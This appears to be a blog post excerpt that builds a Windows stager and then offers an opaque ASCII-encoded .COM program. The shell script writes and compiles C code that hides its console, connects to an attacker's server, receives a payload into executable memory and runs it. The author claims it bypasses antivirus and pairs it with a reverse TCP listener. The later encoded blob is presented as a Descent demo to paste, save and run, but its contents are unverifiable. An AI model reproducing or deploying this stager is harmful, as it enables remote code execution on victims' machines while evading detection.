echo -n 'unsigned char serverp[]="' >> temp.c 
echo -n $port >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo 'void winsock_init() {' >> temp.c 
echo '    WSADATA    wsaData;' >> temp.c 
echo '    WORD    wVersionRequested;' >> temp.c 
echo '    wVersionRequested = MAKEWORD(2, 2);'>> temp.c 
echo '    if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c 
echo '         printf("ws2_32.dll is out of date.\n"); '>> temp.c 
echo '         WSACleanup(); '>> temp.c 
echo '        exit(1);'>> temp.c 
echo '    }' >> temp.c 
echo ' }' >> temp.c 
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c 
echo '    printf("Bad things: %s\n", error);'>> temp.c 
echo '    closesocket(my_socket);'>> temp.c 
echo '    WSACleanup();'>> temp.c 
echo '    exit(1);' >> temp.c 
echo ' }' >> temp.c 
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c 
echo '    int    tret   = 0;'>> temp.c 
echo '    int    nret   = 0;'>>temp.c 
echo '    void * startb = buffer;'>> temp.c 
echo '    while (tret < len) {'>>temp.c 
echo '        nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c 
echo '        startb += nret;'>> temp.c 
echo '        tret   += nret;'>>temp.c 
echo '         if (nret == SOCKET_ERROR)'>> temp.c 
echo '            punt(my_socket, "Could not receive data");'>> temp.c 
echo '    }'>>temp.c 
echo '    return tret;'>> temp.c 
echo '}' >> temp.c  
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c 
echo '    struct hostent *        target;' >> temp.c 
echo '    struct sockaddr_in     sock;' >> temp.c
echo '    SOCKET             my_socket;'>>temp.c 
echo '    my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c 
echo '     if (my_socket == INVALID_SOCKET)'>> temp.c 
echo '        punt(my_socket, ".");'>>temp.c 
echo '    target = gethostbyname(targetip);'>>temp.c 
echo '    if (target == NULL)'>>temp.c 
echo '        punt(my_socket, "..");'>>temp.c 
echo '    memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c 
echo '    sock.sin_family = AF_INET;'>> temp.c 
echo '    sock.sin_port = htons(port);'>>temp.c 
echo '    if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c 
echo '         punt(my_socket, "...");'>>temp.c  
echo '    return my_socket;'>>temp.c 
echo '}' >> temp.c 
echo 'int main(int argc, char * argv[]) {' >> temp.c 
echo '  FreeConsole();'>>temp.c 
echo '    ULONG32 size;'>>temp.c 
echo '    char * buffer;'>>temp.c 
echo '    void (*function)();'>>temp.c 
echo '    winsock_init();'>> temp.c 
echo '    SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c 
echo '    int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c 
echo '    if (count != 4 || size <= 0)'>>temp.c 
echo '        punt(my_socket, "read a strange or incomplete length value\n");'>>temp.c 
echo '    buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c 
echo '    if (buffer == NULL)'>>temp.c 
echo '        punt(my_socket, "could not allocate buffer\n");'>>temp.c 
echo '    buffer[0] = 0xBF;'>>temp.c 
echo '    memcpy(buffer + 1, &my_socket, 4);'>>temp.c 
echo '    count = recv_all(my_socket, buffer + 5, size);'>>temp.c 
echo '    function = (void (*)())buffer;'>>temp.c 
echo '    function();'>>temp.c 
echo '    return 0;'>>temp.c 
echo '}' >> temp.c 
echo 'Compiling binary ..' 
i586-mingw32msvc-gcc  temp.c -o payload.exe -lws2_32
ls -la payload.exe 

You will also need to load your listener with your favorite reverse TCP payload. So far I have tested this on Win7 32bit, Win7 64bit and Win8 64bit, it bypasses AVs fine.

Enjoy…

A quick post here. I have already written a Teensy loader for this, and thought somebody might enjoy it without the device.  So I decided to fill in a gap while all this craziness about BadBios is around…

Magical text here (Will only work in DOS/Win9x/Win2k/XP) so fire up your virtual machines … and enjoy some Descent ….

T_OOWW3=XXWXPY50PPZ5jQP_-ys,A1Ea5y852cP4Z4PP-pV40P-BOu
r2d2lol/Nide5UqPWX,wP500-MQP4UP-wx4XP5rjP5Z2P-jC,JP=
5O4,APRX5BZP-pJPPQX42P-r=PRX55aP59DHHP-99,UP-lt,mP-uq=
P5_VHP-4A40PTZ,TPP_RX__L5Z54BBuDONecL.E44IPZALArpx_ojD
Aop4AAe0xDPF9HQNIAtmKRGgykX3.b8b7555hH44744EtFg8CjnosK
_84TN.O4EkwvHoXIhhAjdiu60o0ru09HQNKpTCwI5_ub5nzDPEOSth
yAW5yThoE7rWwMroHe_1e4o2weRoh5.96DGdFq.36D41FtASQt1Ge0
0qZnADA5p1KRt.9tGWwW8NC7xNfWUfBs3HHPdXIUzgErjh3SuJtdc6
k3izhG2XC65yeIxNsXIKw1xgnLJ0hc3W1eEZ.qLtzJmWXcSBdyZ3Bz
fgpRQ4AYSF3nu5ebeSoidSJ906FWVs70Nzpmvoea7PTq4KBuOn9YgV
7g9e1Zf9b7KGR2ISUjXkcSe3Qaoc8Fg4AgYnNcQ2eJPGGLuQkaKuFk
qOypuI3xsxyr2xnKHTIToSQ7_PHjv5_wpx4hV7x3aZw8gjXIuGA1Q2
_gPNpJvEACUKIGUNiny.nZiB_.__ryTBGZJuwdo7N37mgFIgdx6Cpx
AyVvqnZVmbWFo4Ut35_UQ_0QixXNjB5iKigI1dznHYeWmIG.qJVcEb
0ZCabDQYLABEdG5T3eC44ItaDx69dzBo6_rC4L09BKivUV4kWBwBv4
.kAvYCUlzQAx955aognT0oCyl9NjBdQ_LV3GukNg9W4THerLBxwvdP
fxGZovrge6j3fhSQneJd53Tb8StDyNagYKm2HjhZiq5FDTC_xulHih
gCx9yN.G3isgLzbvkOPezkNYKz_rWKYYZ69iNcG64HlKLtpAnQE4LQ
YydzrKnU9AieObfiDgUvJkGQ4EIHNIInM15hxgf5iRvpr03QXUrdZi
SsYae6uMfqShOLJeDTMkPb7_JVjxHXwuz0g0dxwMdPmjSdkTWSOsCA
Ic_ZKgxrEM8EQ2cMI_wwNMEX6YhAV1Z9D__7Uo23XuZyEhBXDga.Z9
npANaB4V8pKDefIdCYbezFNMZ9DSWFlMnE6JaXT.oLqTuci5x6pcHK
IaC7g8fV2y9OziMRz0C9z7UdyhY4DpWDf84wrlz6bnv_lLttruW3EM
S1KsA50t98n6goQbAJ9HxTKrWL5jFEwD1pTAQvtA3lHz9Pnn1eMfGq
f0LfOYNaoTVUSFhjJJiQXydrW9GLtD5M9eqBjgnL8Y84Q79ALFoW.2
9aB.dmwxm.b_O8hFnWoX.jOoJ.SKThRpsJ6DeKd7wjZOevUeh2zsRQ
C49ySb4ZCsnxSMND5p97dlpc494sy9QzVItn5QwfSz0lQu7cgNY9at
gGzZKeFildCj3gPh.kFP6NPSqVKR8eIONoTn9nQWUbp0dutwsD_sYG
STOnd_ukbGNIpRsI07yYT61_BFfbvFVUb6eI.CYJl9hkb6yRrgcrwB
R6DQiULacSr.01gM1n5DmGDWMHOc.Ea.0YKVWekOM.nKxrqpP9AYe1
tuQYdaL70obddJmw2F1hNbrGHRfhbMZTN8xCgASbh0RYk3SbM8SGRE
HrS8TtRjr9KpmOM4PHe_vgqg1rpV20t.PhhQWelAetIJ1UVQCIKi.Y
gHOIKf3vfoqmFfzOtvF0o2c5eFQNlfnqIQY3IJcAZb3DJcAbwIkx4n
mEOEGjIAcqmHfdwPEFla5CiiLMsUrdSjq5Ii7jKHyqZREe27_0FZh2
wVsQWEge3z1P2qqP4ej2KxG0FfLynZR6buVV6vwzG2et7frazjub9h
q6RgGgTgxAUNlKscyKKolaIOz.Z_e9Hr82R86UmhrnEeRVzXCY98Fp
MW9GyzRunvBOqC7rqxCTx0yKNOqLy2RCIPvx48BrexE8g64lGUVbQ3
z.VARHAkg31OIpLnIPNSrgjZlMfo.9PlzHBBM0tbpQ0H1WPq7s4ZJM
zzce3YdZSpB1.jBsPIlbpQ6yro8rs_sTkKMzauhlAV5hEyOXlylKmw
USdVfdlbvmrQFV4yDwmCFZ_1DkupIp0z_e2zMlubDKTdXlfl8JXfMI
dmbxHDih4t8igRfDsmFipfD6w1731iWJvmima6KCi3Qyw8KuRpWXMu
fjGUM_TEuAGLrSbTUh56LND6bDGp2nE2iVtYrHBsNN7nCfuCtEIVwd
E8mPmSY2eNEMjJCo7o4nHYsZUY9JTGkCXmBPWtxTw6oSHe_zhAWb3P
zisHi5wy7h97DAPaGxAkty5Gky1GDAhHdY3yWqEOVRCH2ZH_uxQ5dF
zviK.YIu3aqmJW.z.DJhFbFiU4oJUyIP0PA2XnYTL6vK.NDvqkdOgT
QVQmhWWbtT2NZzT9bSMU8Coun5eOrNvIQavUM7Ou9WwpczUtrEjv8V
myLTvjrqqsyknCM40Y_iPEeBYA0Bg_EmyNZySrBRv2oUtsq4EgmTuO
jFpQqDKqD.ByjE9YDsYK1FC46lhq4NyQu3fNq4hEaSedWcQJDSfcSJ
81VeGYTEgolv4AY0CunTOVEYSXzKQBA681pYV2eSUW2LSrNF6FdLBo
zVCQ94ZYhRytOQQPHMWq0HqaugXzKF1BzJQiXAmoIEe64ChQ4us4ok
iv_Nywok3ogagdtI3i7iSVHbdeaGoI2cixof6ENMklS5B2fZVHqjt8
ObQjrSaWGupkN1dqs.rBZFS52XW_9_dDWbE2xGLUhYQ.MJOYV7JnXw
Jh5zzjZ9O91xTI2wkDVumgtTN5vCi8VK69.JMHnTceuxE23SI_R5_U
3gs3mBDG8VijU8AAx1l98B.WTpX_8Z0CxMbXEYjCymt8Hmjad6uO8E
XI5WmlBaDxnxBRatEePFjpW51HFMd6uvNiTMfXGkbTWVQ6Y8T9JWeC
YmQbJIYBG8P9I8H_JMUUjNO_m7bmbCsKdoSGNts8t4NTM1fUZ60S.H
ZwERJDkbrZqm8hLJOW8qmgTBJJT5gCwtYh7teU.G.CQzcps0q7C66b
YGd0hxH02szn3qaMC4__uSsG25riXDsAMKTlvyeY6miQPZGyHxooL4
QcGoeC3QVJus4lBZjuXfvmSGD_4s_4i3hMl3S4_7wKwwuluTdXEiyE
p25IEBPgW6w3J1mQpbjQ4TY1B.H2tkXP3Ob.SXj0uOwpataKo.YkSb
WvC7GRzFAkf6shawyzNazUV8jJElIYMTf73th4f.rLnwNmFtBqEq1Q
JvXAr9a7_zlJl8vXLrz.WPHSvc_j_bJ6BedujJK3b9dXKFBCrBggIy
TGHoUBzDwsn.5kdGQujfHkKdxUsLObCM.afTR8TRDBb0xknaW_LAoC
LeJVhD_hQ2tCc6ys8MVvn9TF4qIZfJhgG7xHrzZ5tWd8OM2TAd8xqy
cgePiEe.17bKRupHPODxF9A_05Kx7Az63cJtYwNecrQbOyanD1uX.h
KCSClvsHDquEZH6otuBa5xk6tqg3dZwbQ9klH7BGzyiPXTSV89vh8S
Zvxt_HmhDuJEwmXiykA0KB9sp1krdXqQ0Yg6VAKtn_SAJ6RGEzuEGI
ZqMGy38mdzAIcEu6aejW2QCsoTFqIc8oRGuC0UFcRppmkV3BdWf0MX
AQRE8Tdm1cbG71oDXHGyM0X8cG4uk.8s.UlMyOLvr802Yoyv2L5aiN
3CFdWio8ycCobcUE9XVI5iXG7Xkw2HTNWNk3gYSt.kthf87FJGNNjU
.easLwEcliUZWgTXhRUhtRNgua9PUt56mFGpphkpxV8dm4kg.4rrKK
kpYt1_01JPHYeM8DW._t1j_nJmHJ_wF_v484FHSv.S7cefyt387Vb7
qcsR3NmdJzWiggbBxL46jqUYMFFhqSGQqQuGVS9iVncErXUp5aKS__
4C2QkLbL5XzjcTYbveBoPH4bWh835X0o6P_di3YFLFj0qW8YJzgD1z
nrf0KovaFd85tOV7ZbG9iaF6tBuQNSSeK1EwQE1rXdx8bWdvQgRBEs
vyU6uhkBi7dJCjxdsxdINj9bLvV0FwL21EgRFSK7e1t2lgXpN3pn._
_iIpqTF26k.SV4dixEjjNAv2JC7GtdtKxhpDA6TIQ9iNcA2WP63jYm
Tyv8ObXZme0_dbTH6_NPzcVI7Sof081T9r4Rr_06NROHcS4EMvGf61
qlQ54V___5bKqzqslBdgBJpbro_Sbep0nzvPRWgDYMJj.pJryUz3QY
nlNnYVc8RvkooOIXtfYNLkaC8ZG818SLZxBELsl4IUjUxEIPwSYzq5
pUs87iziu0nviEnK8IwGC21gA4YL3tpAGdbyxQmjbgKz9KubvXN.P6
qs4z7rNaQwlGfsfFkTzJ7Omml_GSUiaDIaz1AQdFSnbgo09CmjguUP
uM5C3J2pzFd9SRXdSfpXNE347GKonCzfSqCxzGwd7b0HCHP_.ePVCc
eivQRAmI_OQ9Q3pgz0Rzf77JAA26uT8we2xxyMvghlG2fQ_oCY3g19
Oa7iioMAPQKnakd78xoHb_6E6oolLPAmgmuGpQphtVL1cJk1SyTOOR
PP0iKBI6p9CWhBZDAVYYWm9mZrJA3zT.sok.6ukilBjvHvEyS46wPq
3w0Ve_19lybCagzK6l3SBkv2S__QMLHjT1PLj0Vw4kQAYn.YyNfYEP
J7ewiyMkPFBJLg1pFzYkXCx1W.3xsGtQL7yi6WE7KB4olRHdNdcZdL
rrBLuieA9.4sDgmJwjol5hOsBo9fC7XwUy2pWF3w7SPnk6ii_xrHf6
2ncc2985ff94NKx_9xirQxVbyCgCr_d56rt__HnRkk1rQcLWgbSwa1
7xVA_BMRS7mnOBDzMj0QHAN7DZuDvTqeBKDMWxwam9SaDOSNXSymm0
cxLt0o_VnwM4.oEa37egQg8Cc1IUKDzAfdkEby0JcdVqZlhqnUChEC
6aasZcocZFxJSOstcQvPNyVp9i0LirWTCF4BPVtvYHdAWA3uW.KmGZ
9CPhb_r3IKSbdYiJNM98kVfVGXvarK2iNRoTJCeOVCC78YpW3NS1Tu
jCurzFPHfliRyqtEv.wfHqkNvfb56cn2SiUnHxQp90Lqpko1.hFYbI
K1gk6x32bopXJPQs8OV_JuY7UuYUhr6N81OGIbHrZmgcv_i3p2DeVt
ap.h8b2wZZdAIW8mHNRwuonyoIrwgA18BMTjw9huW_igJknQhJ4NP1
0ekjGxTx4cbQxrHuYz.3JX5BJrWbLgvciNlLigS.oOgTFqnyF_.PQz
EN9BP4WlcKMyAmEcDt4P6i22cz51.Vzv3Ai46Mp5nwoMy2KbGcO8kF
1nM_6WBRHyR8sh2LzxxnJgW3_WpfYA5puXI4lv_lRyPhNORb3q3M4q
3f3DAPjPhb3OiDciJ9EZh5cKNCXORr2LY53qWMqqFfyGP4YaJLqcF9
IPkXx8PBJcFrriEcB1654qhROoWYMvlJc4QUIyx97lA6tVV03M3f57
iTs.xw8uB47QNM.CUNYG4A3Ts4CdNneeDP.mUGVKJfn0UuCm1JzXzJ
loKipspBNI8MLHCr1ZPLhLGmMseu2sbUrcF67ZXJDJ.aDJ4RrEY1Ut
yc.H9lLcPmhPM.wxMluyEbE6iW04H:

Copy and paste the above text and save with .COM extension & run..                                        Amazing what can be achieved in only 105 lines of ASCII data. Tested on Windows XP SP3.